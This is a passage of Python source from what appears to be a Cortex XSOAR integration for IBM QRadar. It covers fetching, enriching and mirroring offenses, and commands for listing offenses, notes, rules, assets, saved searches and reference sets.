(List[Dict], int): List of the incidents, and the new highest ID for next fetch.
(None, None): if reset was triggered
"""
offense_highest_id = get_minimum_id_to_fetch(last_highest_id, user_query)
user_query = f' AND {user_query}' if user_query else ''
filter_fetch_query = f'id>{offense_highest_id}{user_query}'
print_debug_msg(f'Filter query to QRadar: {filter_fetch_query}')
range_max = offenses_per_fetch - 1 if offenses_per_fetch else MAXIMUM_OFFENSES_PER_FETCH - 1
range_ = f'items=0-{range_max}'
# if it fails here we can't recover, retry again later
raw_offenses = client.offenses_list(range_, filter_=filter_fetch_query, sort=ASCENDING_ID_ORDER)
if raw_offenses:
raw_offenses_len = len(raw_offenses)
print_debug_msg(f'raw_offenses size: {raw_offenses_len}')
else:
print_debug_msg('empty raw_offenses')
new_highest_offense_id = raw_offenses[-1].get('id') if raw_offenses else offense_highest_id
print_debug_msg(f'New highest ID returned from QRadar offenses: {new_highest_offense_id}')
offenses = []
if fetch_mode != FetchMode.no_events.value:
try:
futures = []
for offense in raw_offenses:
futures.append(EXECUTOR.submit(
enrich_offense_with_events,
client=client,
offense=offense,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
))
offenses = [future.result(timeout=DEFAULT_EVENTS_TIMEOUT * 60) for future in futures]
except concurrent.futures.TimeoutError as e:
demisto.error(
f"Error while enriching mirrored offenses with events: {str(e)} \n {traceback.format_exc()}")
update_missing_offenses_from_raw_offenses(raw_offenses, offenses)
else:
offenses = raw_offenses
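    # If a reset was triggered during this fetch, discard the fetched batch.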
if is_reset_triggered():
return None, None
offenses_with_mirror = [
dict(offense, mirror_direction=mirror_direction, mirror_instance=demisto.integrationInstance())
for offense in offenses] if mirror_direction else offenses
enriched_offenses = enrich_offenses_result(client, offenses_with_mirror, ip_enrich, asset_enrich)
final_offenses = sanitize_outputs(enriched_offenses)
incidents = create_incidents_from_offenses(final_offenses, incident_type)
return incidents, new_highest_offense_id
def update_missing_offenses_from_raw_offenses(raw_offenses: list, offenses: list):
"""
    Populate the offenses list with any raw offenses that are missing from it.
"""
offenses_ids = {offense['id'] for offense in raw_offenses} or set()
updated_offenses_ids = {offense['id'] for offense in offenses} or set()
missing_ids = offenses_ids - updated_offenses_ids
if missing_ids:
for offense in raw_offenses:
if offense['id'] in missing_ids:
offenses.append(offense)
def exclude_lists(original: List[dict], exclude: List[dict], key: str):
"""Exclude nodes of exclude list from the original list by key
Args:
original: The original list to exclude from
exclude: The list of nodes to exclude
key: The key to exclude by
Returns: A list with the original nodes that were not excluded.
"""
exclude_keys = [excluded_node.get(key) for excluded_node in exclude]
return [element.copy() for element in original if element.get(key) not in exclude_keys]
def update_mirrored_events(client: Client,
fetch_mode: str,
events_columns: str,
events_limit: int,
context_data: dict,
offenses_per_fetch: int) -> list:
"""Update mirrored offenses' events assuming a long running container.
Args:
client: Client to perform the API calls.
        fetch_mode: Whether to fetch all events or correlation events only.
events_columns: Events columns to extract by search query for each offense.
events_limit: Number of events to be fetched for each offense.
context_data: The integration's current context data. Extract the relevant offenses to update from it.
offenses_per_fetch: The number of offenses to fetch.
Returns: (A list of updated offenses with their events)
"""
offenses = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
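    # Update at most offenses_per_fetch offenses per iteration; the rest remain in the context for later runs.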
if len(offenses) > offenses_per_fetch:
offenses = offenses[:offenses_per_fetch]
updated_offenses = []
try:
if len(offenses) > 0:
futures = []
for offense in offenses:
print_debug_msg(f"Updating events in offense: {offense.get('id')}")
futures.append(EXECUTOR.submit(
enrich_offense_with_events,
client=client,
offense=offense,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
))
updated_offenses += [future.result(timeout=DEFAULT_EVENTS_TIMEOUT * 60) for future in futures]
except Exception as e:
print_debug_msg(f"Error while enriching mirrored offenses with events: {str(e)} \n {traceback.format_exc()}")
update_missing_offenses_from_raw_offenses(offenses, updated_offenses)
finally:
return updated_offenses
def create_incidents_from_offenses(offenses: List[Dict], incident_type: Optional[str]) -> List[Dict]:
"""
Transforms list of offenses given into incidents for Demisto.
Args:
offenses (List[Dict]): List of the offenses to transform into incidents.
incident_type (Optional[str]): Incident type to be used for each incident.
Returns:
(List[Dict]): Incidents list.
"""
print_debug_msg(f'Creating {len(offenses)} incidents')
return [{
'name': f'''{offense.get('id')} {offense.get('description', '')}''',
'rawJSON': json.dumps(offense),
'occurred': get_time_parameter(offense.get('start_time'), iso_format=True),
'type': incident_type
} for offense in offenses]
def print_mirror_events_stats(context_data: dict, stage: str) -> Set[str]:
"""Print debug message with information about mirroring events.
Args:
context_data: The integration context data.
stage: A prefix for the debug message.
    Returns: The IDs of the mirrored offenses currently being processed.
"""
if not context_data:
print_debug_msg("Not printing stats")
return set()
updated = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
waiting_for_update = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
resubmitted_ids = context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])
last_fetch_key = context_data.get(LAST_FETCH_KEY, 'Missing')
last_mirror_update = context_data.get('last_mirror_update', 0)
samples = context_data.get('samples', [])
sample_length = 0
if samples:
sample_length = len(samples[0])
not_updated_ids = [str(offense.get('id')) for offense in waiting_for_update]
stats = [(str(offense.get('id')), len(offense.get('events', []))) for offense in updated]
print_debug_msg(f"Mirror Events Stats: {stage}\n Updated Offenses (id, len(events)): {stats}"
f"\n Offenses ids waiting for update: {not_updated_ids}"
f"\n Resubmitted offenses: {resubmitted_ids}"
f"\n Last Fetch Key {last_fetch_key}, Last mirror update {last_mirror_update}, "
f"sample length {sample_length}")
updated_ids = [offense_id for offense_id, events_num in stats]
return set(not_updated_ids + updated_ids + resubmitted_ids)
@safely_update_context_data
def move_updated_offenses(context_data: dict, version: Any, include_context_data: dict,
updated_list: list) -> Tuple[dict, Any, Any]:
"""Move updated offenses from MIRRORED_OFFENSES_CTX_KEY to UPDATED_MIRRORED_OFFENSES_CTX_KEY.
Args:
context_data: The context data to update
version: The version of the context data
include_context_data: The context data changes to include
updated_list: The list of updated offenses
    Returns: (The encoded new context data, the context data version the changes were based on, the decoded new context data)
"""
new_context_data = include_context_data.copy()
if updated_list:
all_updated_mirrored_offenses = merge_lists(
original_list=context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, []),
updated_list=updated_list, key='id')
not_updated_list = exclude_lists(original=context_data.get(MIRRORED_OFFENSES_CTX_KEY, []),
exclude=updated_list, key="id")
new_context_data.update({UPDATED_MIRRORED_OFFENSES_CTX_KEY: all_updated_mirrored_offenses,
MIRRORED_OFFENSES_CTX_KEY: not_updated_list,
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY:
context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])}) # type: ignore
else:
new_context_data.update(
{UPDATED_MIRRORED_OFFENSES_CTX_KEY: context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, []),
MIRRORED_OFFENSES_CTX_KEY: context_data.get(MIRRORED_OFFENSES_CTX_KEY, []),
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY:
context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])})
if not new_context_data.get('samples'):
new_context_data.update({'samples': context_data.get('samples')})
if not new_context_data.get('last_mirror_update'):
new_context_data.update({'last_mirror_update': str(context_data.get('last_mirror_update', 0))})
return encode_context_data(new_context_data, include_id=True), version, new_context_data
def perform_long_running_loop(client: Client, offenses_per_fetch: int, fetch_mode: str, mirror_options: str,
user_query: str, events_columns: str, events_limit: int, ip_enrich: bool,
asset_enrich: bool, incident_type: Optional[str], mirror_direction: Optional[str]):
is_reset_triggered()
ctx, ctx_version = get_integration_context_with_version()
print_debug_msg(f'Starting fetch loop. Fetch mode: {fetch_mode}, Mirror option: {mirror_options}.')
incidents, new_highest_id = get_incidents_long_running_execution(
client=client,
offenses_per_fetch=offenses_per_fetch,
user_query=user_query,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
ip_enrich=ip_enrich,
asset_enrich=asset_enrich,
last_highest_id=int(json.loads(ctx.get(LAST_FETCH_KEY, '0'))),
incident_type=incident_type,
mirror_direction=mirror_direction
)
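    # Keep only the last fetch ID from the stored context as the baseline for this iteration's context update.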
orig_context_data = extract_context_data(ctx.copy(), include_id=True)
context_data = {LAST_FETCH_KEY: orig_context_data.get(LAST_FETCH_KEY, 0)}
updated_mirrored_offenses = None
ctx = extract_context_data(ctx)
if mirror_options == MIRROR_OFFENSE_AND_EVENTS:
print_mirror_events_stats(ctx, "Long Running Command - Before Update")
updated_mirrored_offenses = update_mirrored_events(client=client,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
context_data=ctx,
offenses_per_fetch=offenses_per_fetch)
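    # Only advance the highest fetched ID and refresh the sample incidents when new incidents were fetched.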
if incidents and new_highest_id:
incident_batch_for_sample = incidents[:SAMPLE_SIZE] if incidents else ctx.get('samples', [])
if incident_batch_for_sample:
print_debug_msg(f'Saving New Highest ID: {new_highest_id}')
context_data.update({'samples': incident_batch_for_sample, LAST_FETCH_KEY: int(new_highest_id)})
# if incident creation fails, it'll drop the data and try again in the next iteration
demisto.createIncidents(incidents)
new_context_data = move_updated_offenses(context_data=ctx, version=ctx_version,
include_context_data=context_data,
updated_list=updated_mirrored_offenses)
print_mirror_events_stats(new_context_data, "Long Running Command - After Update")
def long_running_execution_command(client: Client, params: Dict):
"""
Long running execution of fetching incidents from QRadar service.
    Continuously fetches offenses from QRadar in an infinite loop,
    enriches each offense with events/IPs/assets according to the
    configuration given in the Demisto params,
    transforms the offenses into incidents, and sends them to Demisto
    to be saved as incidents.
Args:
client (Client): Client to perform API calls.
params (Dict): Demisto params.
"""
validate_long_running_params(params)
fetch_mode = params.get('fetch_mode', '')
ip_enrich, asset_enrich = get_offense_enrichment(params.get('enrichment', 'IPs And Assets'))
offenses_per_fetch = int(params.get('offenses_per_fetch')) # type: ignore
user_query = params.get('query', '')
events_columns = params.get('events_columns', '')
events_limit = int(params.get('events_limit') or DEFAULT_EVENTS_LIMIT)
incident_type = params.get('incident_type')
mirror_options = params.get('mirror_options', DEFAULT_MIRRORING_DIRECTION)
mirror_direction = MIRROR_DIRECTION.get(mirror_options)
reset_mirroring_vars = False
while not reset_mirroring_vars:
try:
reset_mirroring_events_variables(mirror_options)
reset_mirroring_vars = True
except Exception as e:
print_debug_msg(
                f'Error while resetting mirroring variables, retrying. Error details: {str(e)} \n'
f'{traceback.format_exc()}')
demisto.error('Exception when calling reset_mirroring_events_variables')
raise e
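    # Main long-running loop: fetch offenses, create incidents, update mirrored events, then sleep and repeat.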
while True:
try:
perform_long_running_loop(
client=client,
offenses_per_fetch=offenses_per_fetch,
fetch_mode=fetch_mode,
mirror_options=mirror_options,
user_query=user_query,
events_columns=events_columns,
events_limit=events_limit,
ip_enrich=ip_enrich,
asset_enrich=asset_enrich,
incident_type=incident_type,
mirror_direction=mirror_direction
)
except Exception:
demisto.error('Error occurred during long running loop')
demisto.error(traceback.format_exc())
finally:
print_debug_msg('Finished fetch loop')
time.sleep(FETCH_SLEEP)
def qradar_offenses_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of offenses from QRadar service.
possible arguments:
- offense_id: Retrieves details of the specific offense that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id = args.get('offense_id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
ip_enrich, asset_enrich = get_offense_enrichment(args.get('enrichment', 'None'))
# if this call fails, raise an error and stop command execution
response = client.offenses_list(range_, offense_id, filter_, fields)
enriched_outputs = enrich_offenses_result(client, response, ip_enrich, asset_enrich)
final_outputs = sanitize_outputs(enriched_outputs, OFFENSE_OLD_NEW_NAMES_MAP)
headers = build_headers(['ID', 'Description', 'OffenseType', 'Status', 'Severity'],
set(OFFENSE_OLD_NEW_NAMES_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Offenses List', final_outputs, headers=headers, removeNull=True),
outputs_prefix='QRadar.Offense',
outputs_key_field='ID',
outputs=final_outputs,
raw_response=response
)
def qradar_offense_update_command(client: Client, args: Dict) -> CommandResults:
"""
Updates offense that corresponds to the given offense ID.
possible arguments:
- offense_id (Required): Update offense that corresponds to ID given.
- protected: Whether the offense is protected.
- follow_up: Whether the offense should be marked for follow up.
- status: Status of the offense. One of 'OPEN', 'HIDDEN', 'CLOSED'.
    - closing_reason_id: The ID of the reason the offense was closed. The full list of closing reason IDs
                         can be retrieved by the 'qradar-closing-reasons' command.
- assigned_to: The user whom to assign the offense to.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id: int = int(args['offense_id'])
protected = args.get('protected')
follow_up = args.get('follow_up')
closing_reason_name = args.get('closing_reason_name')
status = args.get('status')
closing_reason_id = args.get('closing_reason_id')
if status == 'CLOSED' and (not closing_reason_id and not closing_reason_name):
raise DemistoException(
            '''Closing reason ID must be provided when closing an offense. Available closing reasons can be retrieved
            by the 'qradar-closing-reasons' command.'''
)
if closing_reason_name:
# if this call fails, raise an error and stop command execution
closing_reasons_list = client.closing_reasons_list(include_deleted=True, include_reserved=True)
for closing_reason in closing_reasons_list:
if closing_reason.get('text') == closing_reason_name:
closing_reason_id = closing_reason.get('id')
if not closing_reason_id:
raise DemistoException(f'Could not find closing reason name {closing_reason_name}. Please provide a valid'
' closing reason name. Closing reasons can be retrieved by running the '
'qradar-closing-reasons command.')
assigned_to = args.get('assigned_to')
fields = args.get('fields')
ip_enrich, asset_enrich = get_offense_enrichment(args.get('enrichment', 'None'))
# if this call fails, raise an error and stop command execution
response = client.offense_update(offense_id, protected, follow_up, status, closing_reason_id, assigned_to,
fields)
enriched_outputs = enrich_offenses_result(client, response, ip_enrich, asset_enrich)
final_outputs = sanitize_outputs(enriched_outputs, OFFENSE_OLD_NEW_NAMES_MAP)
headers = build_headers(['ID', 'Description', 'OffenseType', 'Status', 'Severity'],
set(OFFENSE_OLD_NEW_NAMES_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('offense Update', final_outputs, headers, removeNull=True),
outputs_prefix='QRadar.Offense',
outputs_key_field='ID',
outputs=final_outputs,
raw_response=response
)
def qradar_closing_reasons_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of closing reasons from QRadar service.
possible arguments:
- closing_reason_id: Retrieves details of the specific closing reason that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
closing_reason_id = args.get('closing_reason_id')
include_reserved = argToBoolean(args.get('include_reserved', False))
include_deleted = argToBoolean(args.get('include_deleted', False))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.closing_reasons_list(closing_reason_id, include_reserved, include_deleted, range_, filter_,
fields)
outputs = sanitize_outputs(response, CLOSING_REASONS_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name'], set(CLOSING_REASONS_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Closing Reasons', outputs, headers=headers, removeNull=True),
outputs_prefix='QRadar.Offense.ClosingReasons',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_offense_notes_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of notes corresponding to the ID of the offense ID given from QRadar service.
possible arguments:
- offense_id: The offense ID to retrieve the notes for.
    - note_id: The note ID to retrieve its details.
- range: Range of notes to return for the offense corresponding to the offense ID (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id: int = int(args['offense_id'])
note_id = args.get('note_id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.offense_notes_list(offense_id, range_, note_id, filter_, fields)
outputs = sanitize_outputs(response, NOTES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Text', 'CreatedBy', 'CreateTime'], set(NOTES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown(f'Offense Notes List For Offense ID {offense_id}', outputs, headers,
removeNull=True),
outputs_prefix='QRadar.Note',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_offense_notes_create_command(client: Client, args: Dict) -> CommandResults:
"""
Create a new note for the offense corresponding to the given offense ID with the note text given
to QRadar service.
possible arguments:
- offense_id: The offense ID to add note to.
- note_text: The note text.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id: int = int(args['offense_id'])
note_text: str = args.get('note_text', '')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.offense_notes_create(offense_id, note_text, fields)
outputs = sanitize_outputs(response, NOTES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Text', 'CreatedBy', 'CreateTime'], set(NOTES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Create Note', outputs, headers, removeNull=True),
outputs_prefix='QRadar.Note',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_rules_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of rules from QRadar service.
possible arguments:
- rule_id: Retrieves details of the specific rule that corresponds to the ID given.
- rule_type: Retrieves rules corresponding to the given rule type.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
rule_id = args.get('rule_id')
rule_type = args.get('rule_type')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
if not filter_ and rule_type:
filter_ = f'type={rule_type}'
# if this call fails, raise an error and stop command execution
response = client.rules_list(rule_id, range_, filter_, fields)
outputs = sanitize_outputs(response, RULES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Type'], set(RULES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Rules List', outputs, headers=headers, removeNull=True),
outputs_prefix='QRadar.Rule',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_rule_groups_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of rule groups from QRadar service.
possible arguments:
- rule_group_id: Retrieves details of the specific rule group that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
rule_group_id = arg_to_number(args.get('rule_group_id'))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.rule_groups_list(range_, rule_group_id, filter_, fields)
outputs = sanitize_outputs(response, RULES_GROUP_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Description', 'Owner'], set(RULES_GROUP_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Rules Group List', outputs, headers, removeNull=True),
outputs_prefix='QRadar.RuleGroup',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_assets_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of assets from QRadar service.
possible arguments:
- asset_id: Retrieves details of the specific asset that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
asset_id = args.get('asset_id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
    # If an asset ID was given, it overrides any filter that was also given.
if asset_id:
filter_ = f'id={asset_id}'
    full_enrichment = bool(asset_id)
# if this call fails, raise an error and stop command execution
response = client.assets_list(range_, filter_, fields)
enriched_outputs = enrich_assets_results(client, response, full_enrichment)
assets_results = dict()
assets_hr = []
endpoints = []
for output in enriched_outputs:
output['Asset']['hostnames'] = add_iso_entries_to_dict(output.get('Asset', dict()).get('hostnames', []))
output['Asset']['users'] = add_iso_entries_to_dict(output.get('Asset', dict()).get('users', []))
output['Asset']['products'] = add_iso_entries_to_dict(output.get('Asset', dict()).get('products', []))
output['Asset'] = sanitize_outputs(output.get('Asset'), ASSET_OLD_NEW_MAP)[0]
assets_hr.append(output['Asset'])
assets_results[f'''QRadar.Asset(val.ID === "{output['Asset']['ID']}")'''] = output['Asset']
sanitized_endpoint = remove_empty_elements(output.get('Endpoint', dict()))
if sanitized_endpoint:
endpoints.append(sanitized_endpoint)
asset_human_readable = tableToMarkdown('Assets List', assets_hr, removeNull=True)
endpoints_human_readable = tableToMarkdown('Endpoints', endpoints, removeNull=True)
if endpoints:
assets_results['Endpoint'] = endpoints
return CommandResults(
readable_output=asset_human_readable + endpoints_human_readable,
outputs=assets_results,
raw_response=response
)
def qradar_saved_searches_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of saved searches from QRadar service.
possible arguments:
- saved_search_id: Retrieves details of the specific saved search that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
saved_search_id = args.get('saved_search_id')
timeout: Optional[int] = arg_to_number(args.get('timeout', DEFAULT_TIMEOUT_VALUE))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.saved_searches_list(range_, timeout, saved_search_id, filter_, fields)
outputs = sanitize_outputs(response, SAVED_SEARCH_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Description'], set(SAVED_SEARCH_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Saved Searches List', outputs, headers, removeNull=True),
outputs_prefix='QRadar.SavedSearch',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_searches_list_command(client: Client, args: Dict) -> CommandResults:
"""
    Retrieves list of search IDs from QRadar service.
possible arguments:
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
# if this call fails, raise an error and stop command execution
response = client.searches_list(range_, filter_)
outputs = [{'SearchID': search_id} for search_id in response]
return CommandResults(
readable_output=tableToMarkdown('Search ID List', outputs),
outputs_prefix='QRadar.SearchID',
outputs_key_field='SearchID',
outputs=outputs,
raw_response=response
)
def qradar_search_create_command(client: Client, args: Dict) -> CommandResults:
"""
Create a search in QRadar service.
possible arguments:
- query_expression: The AQL query to execute. Mutually exclusive with saved_search_id.
- saved_search_id: Saved search ID to execute. Mutually exclusive with query_expression.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
query_expression = args.get('query_expression')
saved_search_id = args.get('saved_search_id')
# if this call fails, raise an error and stop command execution
response = client.search_create(query_expression, saved_search_id)
outputs = sanitize_outputs(response, SEARCH_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Create Search', outputs),
outputs_prefix='QRadar.Search',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_search_status_get_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves search status from QRadar service.
possible arguments:
- search_id (Required): The search ID to retrieve its status.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
search_id: str = args.get('search_id', '')
# if this call fails, raise an error and stop command execution
response = client.search_status_get(search_id)
outputs = sanitize_outputs(response, SEARCH_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown(f'Search Status For Search ID {search_id}', outputs),
outputs_prefix='QRadar.Search',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_search_results_get_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves search results from QRadar service.
possible arguments:
- search_id: Search ID to retrieve its results.
    - output_path: If specified, will be used as the context output path prefix.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
search_id: str = args.get('search_id', '')
output_path = args.get('output_path')
    # Use 'or' instead of a default value to keep backward compatibility with QRadarFullSearch
range_ = f'''items={args.get('range') or DEFAULT_RANGE_VALUE}'''
# if this call fails, raise an error and stop command execution
response = client.search_results_get(search_id, range_)
if not response:
raise DemistoException('Unexpected response from QRadar service.')
result_key = list(response.keys())[0]
outputs = sanitize_outputs(response.get(result_key))
outputs_prefix = output_path if output_path else f'QRadar.Search(val.ID === "{search_id}").Result.{result_key}'
return CommandResults(
readable_output=tableToMarkdown(f'Search Results For Search ID {search_id}', outputs),
outputs_prefix=outputs_prefix,
outputs=outputs,
raw_response=response
)
def qradar_reference_sets_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of reference sets from QRadar service.
possible arguments:
- ref_name: Retrieves details of the specific reference that corresponds to the reference name given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name = args.get('ref_name')
convert_date_value = argToBoolean(args.get('date_value', False))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.reference_sets_list(range_, ref_name, filter_, fields)
if ref_name:
outputs = dict(response)
if convert_date_value and outputs.get('element_type') == 'DATE':
for data_entry in outputs.get('data', []):
data_entry['value'] = get_time_parameter(data_entry.get('value'), iso_format=True)
outputs['data'] = sanitize_outputs(outputs.get('data', []), REFERENCE_SET_DATA_OLD_NEW_MAP)
else:
outputs = response
final_outputs = sanitize_outputs(outputs, REFERENCE_SETS_OLD_NEW_MAP)
headers = build_headers(['Name', 'ElementType', 'Data', 'TimeToLive', 'TimeoutType'],
set(REFERENCE_SETS_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Reference Sets List', final_outputs, headers, removeNull=True),
outputs_prefix='QRadar.Reference',
outputs_key_field='Name',
outputs=final_outputs,
raw_response=response
)
def qradar_reference_set_create_command(client: Client, args: Dict) -> CommandResults:
"""
Create a new reference set.
possible arguments:
- ref_name (Required): The name of the new reference set.
- element_type (Required): The type of the new reference set. Can be ALN (alphanumeric),
ALNIC (alphanumeric ignore case), IP (IP address), NUM (numeric),
